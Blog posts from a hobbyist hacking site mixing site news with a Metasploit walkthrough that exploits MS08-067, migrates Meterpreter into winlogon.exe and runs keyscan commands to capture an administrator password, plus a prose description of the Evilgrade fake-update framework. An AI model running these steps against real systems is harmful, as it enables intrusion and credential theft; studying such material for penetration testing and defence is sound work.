as you may have noticed we’ve added some new forum sections where u can post your own music and art. so check it out and post ur beats and lyrics

It’s been a while…

We decided to take an unexpected sabatical from the site about 3 months ago, mostly due to other commitments, like sports, school, and all that fun stuff. Despite all that we’re back with a bunch of new stuff. As you can see, We’ve updated the design of the site. The old theme was a bit outdated and had some CSS issues. The SMF forums also decided to commit harri karri by corrupting its own SQL data. I was too lazy to try and restore it… so give a big welcome to the new and improved Simple:Press forums! More features are soon to come.

Now to start off the return of our site, and to hit the ground running, I thought I’d share something I found out about  around 4 minutes ago. The MSF crew has added a new feature to sniff keystrokes remotely within the meterpreter payload. The only problem is that the keylogger can only sniff keystrokes from processes that interact with the desktop. This can be easily fixed by migrating to a specific process, such as Explorer.exe or winlogon.exe. They give an example on the blog based off the MS08-067 exploit but it can easily be reproduced without an exploit:

msf exploit(ms08_067_netapi) > exploit
[*] Triggering the vulnerability…
[*] Sending stage (2650 bytes)
[*] Uploading DLL (75787 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened

meterpreter > ps

Process list
============

PID Name Path
— —- —-
292 wscntfy.exe C:\WINDOWS\system32\wscntfy.exe
316 Explorer.EXE C:\WINDOWS\Explorer.EXE
356 smss.exe \SystemRoot\System32\smss.exe
416 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
440 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
[ snip ]

meterpreter > migrate 440
[*] Migrating to 440…
[*] Migration completed successfully.

meterpreter > keyscan_start
Starting the keystroke sniffer…
[ wait for user login ]

meterpreter > keyscan_dump
Dumping captured keystrokes…
Administrator <Tab> s3cretp4ss <Return>

If you haven’t noticed already, we’ve been lacking on new updates to the site. No it’s not because we’re lazy (well that may be part of it) but rather because we’ve been working on a little project . For the past 3 weeks Spitfire and myself have been developing a Linux Distribution that we’ve dubbed Chronix. Our ultimate goal with this distro is to provide people with an alternative to Backtrack, though right now it doesn’t even come close to the pentesting liveCD we all love .
The Distro is an LFS, meaning everything was compiled from scratch. I’ve added slapt-get, which is slackware’s package manager, to make installing packages easier. I’ve also added rpm, and plan to try and merge portage with slapt-get, leaving a final Linux mut of Slackware+Gentoo+Redhat. To add to the mix, we might use LZMA(file system algorithm slax uses) when creating the liveCD.
Get the Flash Player to see this player.

Watch Full Size Video

Some Specs:
Chronix has…..

The list is and will grow longer as time goes on, but we can’t do this alone. After spit and I find a storage solution, we will be uploading a liveCD and a VMware image of the distro, making the project open source. So stay tuned

So after a series of different experiments with Wordpress based forums, we decided to drop the whole idea together and set up an integrated BB based forum. It took a little longer then expected, and after much frustration and several MySQL restores later, we finally boiled it down to the final (yet still dynamic) product. Just click on the forums tab up at the top and post till your fingers bleed (figure of speech don’t really do that).

–Quick Note: You MUST be registered to view all of the boards and topics!

Evilgrade is a new framework developed by infobyte which takes advantage of the poorly implemented upgrade methods of different applications. The framework runs off of modules; each module servers as the structure needed to emulate a fake update, allowing for fake update injection. However, Evilgrade only works if there is manipulation of network traffic, i.e. DNS Cache poisoning or MITM attacks. In this video we show you how to set up and run evilgrade. The framework initially comes with 10 modules, but you can certainly write your own modules for different applications. Remember this is only version 1 and there may be bugs, so it’s best not to try and use this offensively.

Get the Flash Player to see this player.

Watch the Video!